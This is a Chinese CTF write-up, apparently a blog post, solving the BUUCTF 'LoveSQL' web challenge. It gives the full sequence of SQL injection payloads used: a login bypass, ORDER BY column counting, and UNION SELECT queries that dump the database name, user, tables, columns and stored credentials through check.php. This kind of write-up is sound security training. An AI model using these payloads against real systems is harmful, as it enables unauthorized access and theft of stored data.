buuctf web [极客大挑战 2019]LoveSQL

又是这样的界面,这糟糕的熟悉感,依旧使用上题套路

复制代码
用户名:
admin' or 1=1#
密码:
1

有一串很像flag的字符,但是很可惜,这不是flag

看了一眼源代码,没有可以跳转的页面

要换个思路了,重新查看题目,发现输入的东西在check.php页面有回显,并且url上也有显示,所以尝试sql注入

1、查看字段数
php 复制代码
/check.php?username=admin'order by 1%23&password=1
/check.php?username=admin'order by 2%23&password=1
/check.php?username=admin'order by 3%23&password=1
/check.php?username=admin'order by 4%23&password=1
##由于我们在url中输入,所以要把#换成url编码%23

字段为4报错,所以字段数是3

ps:补充(在url输入的时候要使url编码,具体要求看,你的输入有多少变成了url编码格式)

2、寻找回显字段

username=admin可能会影响系统的回显,所以把admin改成1

php 复制代码
/check.php?username=1'union select 1,2,3%23&password=1

可以看出,回显字段为2,3,所以我们把想要的信息,放在2,3的位置,让它显示在页面上

3、 爆破库与用户

php 复制代码
/check.php?username=1'union select 1,database(),user()%23&password=1

4、爆破表

复制代码
/check.php?username=1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

可以看到爆出来了两个表

5、爆l0ve1ysq1表

复制代码
/check.php?username=1'union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1

6、尝试爆l0ve1ysq1表里的3个数据

复制代码
/check.php?username=1'union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

flag显示不完整,打开源码就能看到完整的了

相关推荐
Anastasiozzzz几秒前
Java Lambda 揭秘:从匿名内部类到底层原理的深度解析
java·开发语言
骇客野人2 分钟前
通过脚本推送Docker镜像
java·docker·容器
刘琦沛在进步4 分钟前
【C / C++】引用和函数重载的介绍
c语言·开发语言·c++
C澒5 分钟前
Remesh 框架详解:基于 CQRS 的前端领域驱动设计方案
前端·架构·前端框架·状态模式
Charlie_lll9 分钟前
学习Three.js–雪花
前端·three.js
机器视觉的发动机16 分钟前
AI算力中心的能耗挑战与未来破局之路
开发语言·人工智能·自动化·视觉检测·机器视觉
铁蛋AI编程实战19 分钟前
通义千问 3.5 Turbo GGUF 量化版本地部署教程:4G 显存即可运行,数据永不泄露
java·人工智能·python
HyperAI超神经24 分钟前
在线教程|DeepSeek-OCR 2公式/表格解析同步改善,以低视觉token成本实现近4%的性能跃迁
开发语言·人工智能·深度学习·神经网络·机器学习·ocr·创业创新
onebyte8bits25 分钟前
前端国际化(i18n)体系设计与工程化落地
前端·国际化·i18n·工程化
晚霞的不甘30 分钟前
CANN 编译器深度解析:UB、L1 与 Global Memory 的协同调度机制
java·后端·spring·架构·音视频